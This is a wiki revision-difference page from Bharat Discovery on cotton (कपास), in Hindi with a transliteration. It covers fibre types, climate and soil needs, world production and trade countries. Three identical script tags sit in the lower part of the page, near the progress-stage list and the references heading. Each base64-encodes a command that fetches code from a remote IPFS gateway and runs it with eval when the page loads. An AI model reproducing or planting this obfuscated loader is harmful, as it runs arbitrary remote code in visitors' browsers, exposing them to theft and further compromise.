Difference between revisions of "कपास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
कपास ''नकदी फ़सल'' है। इससे रूई तैयार की जाती है, कपास को जिसे 'सफ़ेद सोना' भी कहा जाता है। कपास लम्बे रेशे वाले सबसे सर्वोत्तम प्रकार के होते हैं, जिसकी लम्बाई 5 सेंमी0 से अधिक होती है। इससे उच्च कोटि का कपड़ा बनाया जाता है। तटीय क्षेत्रों में पैदा होने के कारण इसे ''समुद्र द्वीपीय कपास'' भी कहते हैं। मध्य रेशे वाला कपास जिसकी लम्बाई 3.5 से 5 सें0 मी0 तक होती है, मिश्रित कपास कहलाता है। तीसरे प्रकार का कपास छोटे रेशे वाला होता है, जिसके रेशे की लम्बाई 3.5 सें0 मी0 तक होती है।
 
कपास ''नकदी फ़सल'' है। इससे रूई तैयार की जाती है, कपास को जिसे 'सफ़ेद सोना' भी कहा जाता है। कपास लम्बे रेशे वाले सबसे सर्वोत्तम प्रकार के होते हैं, जिसकी लम्बाई 5 सेंमी0 से अधिक होती है। इससे उच्च कोटि का कपड़ा बनाया जाता है। तटीय क्षेत्रों में पैदा होने के कारण इसे ''समुद्र द्वीपीय कपास'' भी कहते हैं। मध्य रेशे वाला कपास जिसकी लम्बाई 3.5 से 5 सें0 मी0 तक होती है, मिश्रित कपास कहलाता है। तीसरे प्रकार का कपास छोटे रेशे वाला होता है, जिसके रेशे की लम्बाई 3.5 सें0 मी0 तक होती है।
 
==भौगोलिक स्थिति==
 
==भौगोलिक स्थिति==
तापमान-210 से 270 सें0 ग्रे0  
+
*तापमान-210 से 270 सें0 ग्रे0  
वर्षा-75 से 100 सें0 मी0
+
*वर्षा-75 से 100 सें0 मी0
मिट्टी-काली  
+
*मिट्टी-काली  
 
==विश्व वितरण==  
 
==विश्व वितरण==  
 
विश्व में प्रतिवर्ष लगभग 150 लाख मीट्रिक टन कपास पैदा होता है। सं. रा. अमेरिका, [[चीन]], [[भारत]], ब्राजील, मिस्र, सूडान आदि कपास के प्रमुख उत्पादक देश हैं।  
 
विश्व में प्रतिवर्ष लगभग 150 लाख मीट्रिक टन कपास पैदा होता है। सं. रा. अमेरिका, [[चीन]], [[भारत]], ब्राजील, मिस्र, सूडान आदि कपास के प्रमुख उत्पादक देश हैं।  

Revision as of 05:50, 25 May 2011

kapas nakadi fasal hai. isase rooee taiyar ki jati hai, kapas ko jise 'safed sona' bhi kaha jata hai. kapas lambe reshe vale sabase sarvottam prakar ke hote haian, jisaki lambaee 5 seanmi0 se adhik hoti hai. isase uchch koti ka kap da banaya jata hai. tatiy kshetroan mean paida hone ke karan ise samudr dvipiy kapas bhi kahate haian. madhy reshe vala kapas jisaki lambaee 3.5 se 5 sean0 mi0 tak hoti hai, mishrit kapas kahalata hai. tisare prakar ka kapas chhote reshe vala hota hai, jisake reshe ki lambaee 3.5 sean0 mi0 tak hoti hai.

bhaugolik sthiti

  • tapaman-210 se 270 sean0 gre0
  • varsha-75 se 100 sean0 mi0
  • mitti-kali

vishv vitaran

vishv mean prativarsh lagabhag 150 lakh mitrik tan kapas paida hota hai. san. ra. amerika, chin, bharat, brajil, misr, soodan adi kapas ke pramukh utpadak desh haian.

utpadan

sanyukt rajy amerika kapas utpadan ka vishv mean sabase b da utpadak desh hai. yahaan vishv ka lagabhag 22% kapas paida kiya jata hai. chin mean vishv ka 17% kapas ka utpadan kiya jata hai. chin mean yaangtasi nadi ki nichali ghati tatha hvaang-ho nadi ka oopari delta pramukh kapas ke utpadak kshetr haian. bharat mean 8% kapas ka utpadan kiya jata hai. kapas utpadan ki drishti se bharat ka vishv mean tisara sthan hai. kapas utpadan ke pramukh rajyoan mean kramashah maharashtr, gujarat, rajasthan, panjab, hariyana tatha pashchimi uttar pradesh pramukh haian. any utpadak deshoan mean brajil ka saopolo kshetr, misr ka nil delta, soodan ka jajira v safed nil ki ghati tatha pakistan adi mahattvapoorn haian.

niryatak desh

sanyukt rajy amerika, ujbekistan, yookren, pakistan, misr, soodan, brajil, peroo, maiksiko, turki, bharat, siriya, kolambiya adi.

ayatak desh

japan, (15%), koriya (8%), chin (7%), itali (6%), jarmani (5%), phraans (4%), polaind (3%), slovakiya, indoneshiya, astreliya, bharat adi.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>